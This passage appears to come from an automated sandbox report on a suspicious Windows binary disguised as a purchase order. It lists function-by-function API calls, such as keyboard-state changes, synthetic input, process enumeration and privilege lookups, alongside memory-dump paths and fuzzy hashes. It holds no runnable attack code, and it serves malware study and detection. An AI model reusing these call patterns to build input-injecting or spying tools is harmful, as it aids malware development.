                          • Opcode Fuzzy Hash: f62beb91ed06550f6a11e6133c1aa0d143a93a7fcd9e5cce05ea0963430df6fc
                          • Instruction Fuzzy Hash: B0411776E00314BFD724DF78CC51B6ABBE9EB88730F10462AF641DB282D775A941A790
                          Function 00F756D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F75783
                          • GetLastError.KERNEL32(?,00000000), ref: 00F757A9
                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F757CE
                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F757FA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateHardLink$DeleteErrorFileLast
                          • String ID:
                          • API String ID: 3321077145-0
                          • Opcode ID: b68f132eb41715faa0a28cdcb5f11246e95dca482cc03b5c0a04cd70ac838bd1
                          • Instruction ID: 9dd5c21c17589b09d4ed58882a515957a90d8b1c542ef8282204c7e8938187c8
                          • Opcode Fuzzy Hash: b68f132eb41715faa0a28cdcb5f11246e95dca482cc03b5c0a04cd70ac838bd1
                          • Instruction Fuzzy Hash: F6414135600610DFCB11EF15C844A5DBBF2EF49720B19C489E84A9B3A6CB74FD41EB92
                          Function 00F3D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00F26D71,00000000,00000000,00F282D9,?,00F282D9,?,00000001,00F26D71,8BE85006,00000001,00F282D9,00F282D9), ref: 00F3D910
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F3D999
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00F3D9AB
                          • __freea.LIBCMT ref: 00F3D9B4
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 3c7e8c3a0318ca10cd0348bd4efc8fd183b505e72f664f5d610d66264842c137
                          • Instruction ID: 6454c61f5eb3b3e7939d23fa53a67c77b52ff1c0c0e323a0136e5892ca507871
                          • Opcode Fuzzy Hash: 3c7e8c3a0318ca10cd0348bd4efc8fd183b505e72f664f5d610d66264842c137
                          • Instruction Fuzzy Hash: 3931CF72E0121AABDF25DF64EC41EAE7BA5EB40720F054169FC04D7251EB39DD50EBA0
                          Function 00F952C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00F95352
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F95375
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F95382
                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F953A8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LongWindow$InvalidateMessageRectSend
                          • String ID:
                          • API String ID: 3340791633-0
                          • Opcode ID: 654704ea940574f38c152f948d590502052fd666c1a54d77069b33be241ddca7
                          • Instruction ID: efa88a1815aa2796fc7fd663af803ba9c8fd9b5398243246fe3f11d3a74e1339
                          • Opcode Fuzzy Hash: 654704ea940574f38c152f948d590502052fd666c1a54d77069b33be241ddca7
                          • Instruction Fuzzy Hash: BE31D035E55A0CEFFF369B54CC15FE83763AB04BA0F584102FA14961E1C7B19980BB82
                          Function 00F6AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F6ABF1
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F6AC0D
                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F6AC74
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F6ACC6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 029c8358fd38cb6bca924349bc9220fe25cf1812ce5fc8816a3306672196a96e
                          • Instruction ID: c23cb9a5073cdd7ee718a411013ff3ea7fe7918d6b67c842d2fc4a3ac7567352
                          • Opcode Fuzzy Hash: 029c8358fd38cb6bca924349bc9220fe25cf1812ce5fc8816a3306672196a96e
                          • Instruction Fuzzy Hash: 0F310731E047186FEF35CB658C04BFA7BB5AB89320F04431AE485A21D1C379D985BFA2
                          Function 00F97674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                          Download Yara Rule
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 00F9769A
                          • GetWindowRect.USER32(?,?), ref: 00F97710
                          • PtInRect.USER32(?,?,00F98B89), ref: 00F97720
                          • MessageBeep.USER32(00000000), ref: 00F9778C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Rect$BeepClientMessageScreenWindow
                          • String ID:
                          • API String ID: 1352109105-0
                          • Opcode ID: fea80673bf10bc2689e3ab29e28457b0c9f18aa6315199da466867c60fc7c5de
                          • Instruction ID: 294c23e71b7be2c3ac7c7c23419d70c6d8cfd23627a04d1e32fb074ad74aa7cb
                          • Opcode Fuzzy Hash: fea80673bf10bc2689e3ab29e28457b0c9f18aa6315199da466867c60fc7c5de
                          • Instruction Fuzzy Hash: 0F41A035A15318EFEF01EFA8C894EA9BBF5FB49310F1540A9E4149B261C331A941EF92
                          Function 00F916DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32 ref: 00F916EB
                            • Part of subcall function 00F63A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63A57
                            • Part of subcall function 00F63A3D: GetCurrentThreadId.KERNEL32 ref: 00F63A5E
                            • Part of subcall function 00F63A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F625B3), ref: 00F63A65
                          • GetCaretPos.USER32(?), ref: 00F916FF
                          • ClientToScreen.USER32(00000000,?), ref: 00F9174C
                          • GetForegroundWindow.USER32 ref: 00F91752
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: 290eab5e81097eb40cb7073c4b848757a42354e0f167b0f8758114350b0231b6
                          • Instruction ID: 9637ffd21acf26b613ede57dbdb70287ed5f465b02a1196536fa6b62f326b777
                          • Opcode Fuzzy Hash: 290eab5e81097eb40cb7073c4b848757a42354e0f167b0f8758114350b0231b6
                          • Instruction Fuzzy Hash: 62314175D00249AFDB00EFA9C881CAEB7F9EF48304B5480AAE415E7251DB359E45EBA1
                          Function 00F6D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00F6D501
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00F6D50F
                          • Process32NextW.KERNEL32(00000000,?), ref: 00F6D52F
                          • CloseHandle.KERNEL32(00000000), ref: 00F6D5DC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: b974c8f6c0882a927be557b43531195bea4bfb0b9304b1123e4da4efe5e35d5a
                          • Instruction ID: 9c542ad56c8cce9c5ce32673eb9d88c5a86713f4102b6c958d13638ec359129b
                          • Opcode Fuzzy Hash: b974c8f6c0882a927be557b43531195bea4bfb0b9304b1123e4da4efe5e35d5a
                          • Instruction Fuzzy Hash: 2E31B4725083009FD300EF54CC81AAFBBF8EF99354F54092DF582871A2EB719944EBA2
                          Function 00F98FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          • GetCursorPos.USER32(?), ref: 00F99001
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F57711,?,?,?,?,?), ref: 00F99016
                          • GetCursorPos.USER32(?), ref: 00F9905E
                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F57711,?,?,?), ref: 00F99094
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                          • String ID:
                          • API String ID: 2864067406-0
                          • Opcode ID: ece57ed00c3b7ee3822233d0dfc18d676a8f13af10bf76db4784caef63581231
                          • Instruction ID: b1a98f568f98305e4b48293100a2c49ae84b678039b52ec11e3c45aaa464358c
                          • Opcode Fuzzy Hash: ece57ed00c3b7ee3822233d0dfc18d676a8f13af10bf76db4784caef63581231
                          • Instruction Fuzzy Hash: EA218035604018BFEF258FA9CC58EEA7BB9FB49360F05405AF51547271C37299A0FBA0
                          Function 00F6D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          • GetFileAttributesW.KERNEL32(?,00F9CB68), ref: 00F6D2FB
                          • GetLastError.KERNEL32 ref: 00F6D30A
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6D319
                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F9CB68), ref: 00F6D376
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast
                          • String ID:
                          • API String ID: 2267087916-0
                          • Opcode ID: 7485e70a3b5ecd1acbc76292b41ca4e262d34032ca3abc464a190a7885ef93dc
                          • Instruction ID: f478ab54ccd6db70717dac21188b43b343a6d154cdac6ef65eb4d5344ebab26b
                          • Opcode Fuzzy Hash: 7485e70a3b5ecd1acbc76292b41ca4e262d34032ca3abc464a190a7885ef93dc
                          • Instruction Fuzzy Hash: EB217170A092019FC710DF24C98286A77E8AE55368F504A1DF499C73E2E731D945EB93
                          Function 00F61571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F61014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F6102A
                            • Part of subcall function 00F61014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F61036
                            • Part of subcall function 00F61014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61045
                            • Part of subcall function 00F61014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F6104C
                            • Part of subcall function 00F61014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61062
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F615BE
                          • _memcmp.LIBVCRUNTIME ref: 00F615E1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F61617
                          • HeapFree.KERNEL32(00000000), ref: 00F6161E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                          • String ID:
                          • API String ID: 1592001646-0
                          • Opcode ID: 82083235fff75792e443fa66ed44e8cbe43b25a79b96adedbf9b338f0d280af5
                          • Instruction ID: fa830bbd3bc573cb7fc161681194f55da073be7e6751efe6bf14b806b0751dad
                          • Opcode Fuzzy Hash: 82083235fff75792e443fa66ed44e8cbe43b25a79b96adedbf9b338f0d280af5
                          • Instruction Fuzzy Hash: 4A217831E00108AFEF10DFA8C945BEEB7B8FF44364F084459E441AB241E731AE45EBA0
                          Function 00F92782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00F9280A
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F92824
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F92832
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F92840
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: ef296520797de7667d921e149dcf4618e1524bcc762f24aeb332ac23b27d9dab
                          • Instruction ID: 0adda544fbdb6ba587195cb991c13e3c1b859fb63e5048e075b20159ae5cc841
                          • Opcode Fuzzy Hash: ef296520797de7667d921e149dcf4618e1524bcc762f24aeb332ac23b27d9dab
                          • Instruction Fuzzy Hash: 3521F131604111BFEB14DB24CC44FAA7B95AF85324F198259F42A8B2E2CB75FC42EBD1
                          Function 00F678F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F68D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00F6790A,?,000000FF,?,00F68754,00000000,?,0000001C,?,?), ref: 00F68D8C
                            • Part of subcall function 00F68D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00F68DB2
                            • Part of subcall function 00F68D7D: lstrcmpiW.KERNEL32(00000000,?,00F6790A,?,000000FF,?,00F68754,00000000,?,0000001C,?,?), ref: 00F68DE3
                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00F68754,00000000,?,0000001C,?,?,00000000), ref: 00F67923
                          • lstrcpyW.KERNEL32(00000000,?), ref: 00F67949
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,00F68754,00000000,?,0000001C,?,?,00000000), ref: 00F67984
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: f6e3b64fd292530ef3688beac6445148e38185b58e47e4928b9fe5b6d7d4575b
                          • Instruction ID: 9f38e41aba34600c3fd50e86f074ba3269c452b65b2a936022fa1a4e6ba33116
                          • Opcode Fuzzy Hash: f6e3b64fd292530ef3688beac6445148e38185b58e47e4928b9fe5b6d7d4575b
                          • Instruction Fuzzy Hash: 4811293A200302ABCB156F38CC45E7B77E5FF45394B40402AF802C7264EB31D841E7A1
                          Function 00F97CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 00F97D0B
                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00F97D2A
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F97D42
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F7B7AD,00000000), ref: 00F97D6B
                            • Part of subcall function 00F19BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F19BB2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID:
                          • API String ID: 847901565-0
                          • Opcode ID: 988e4c5f52231bbf71286200ec0a20cef9dcffb5dab2fe9c73ac8f89b07b50e7
                          • Instruction ID: dc3cff26fc24f9af40f0a8b3c4eaaaf717e792f9a7989eda13b30747fbbccd78
                          • Opcode Fuzzy Hash: 988e4c5f52231bbf71286200ec0a20cef9dcffb5dab2fe9c73ac8f89b07b50e7
                          • Instruction Fuzzy Hash: 1A118B72915718ABDF10AF28CC04AA63BA5BF45370B154326F839D72E0D7308951EB90
                          Function 00F95660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00F956BB
                          • _wcslen.LIBCMT ref: 00F956CD
                          • _wcslen.LIBCMT ref: 00F956D8
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F95816
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend_wcslen
                          • String ID:
                          • API String ID: 455545452-0
                          • Opcode ID: 0fe1a008542aa5a4bae5dce06d961bf833c4400263cff9e3960f044250040e89
                          • Instruction ID: 39e1eb866b3fa844b252d6aef9fe39a18fb187c90f358dc00f640430270cdbfb
                          • Opcode Fuzzy Hash: 0fe1a008542aa5a4bae5dce06d961bf833c4400263cff9e3960f044250040e89
                          • Instruction Fuzzy Hash: 3A11D672A00618A6FF21DF65DC85AEE776CEF11B70B104026FA15D6081E7B4D980EB60
                          Function 00F31D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b47e6b214b83f69b61f4918b917df07b35611bdddb43b28082f7da414151d56
                          • Instruction ID: 2477c24ff1a198b717d9d6223143b3b89a5a8053f04cdc1daa2f8779faaf4a37
                          • Opcode Fuzzy Hash: 1b47e6b214b83f69b61f4918b917df07b35611bdddb43b28082f7da414151d56
                          • Instruction Fuzzy Hash: A80181B260A61A7EF6612A787CC1F6B772DEF423B8F340326F521A12D2DB649C447174
                          Function 00F1990C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • SetTextColor.GDI32(?,?), ref: 00F198D6
                          • SetBkMode.GDI32(?,00000001), ref: 00F198E9
                          • GetStockObject.GDI32(00000005), ref: 00F198F1
                          • GetWindowLongW.USER32(?,000000EB), ref: 00F19952
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
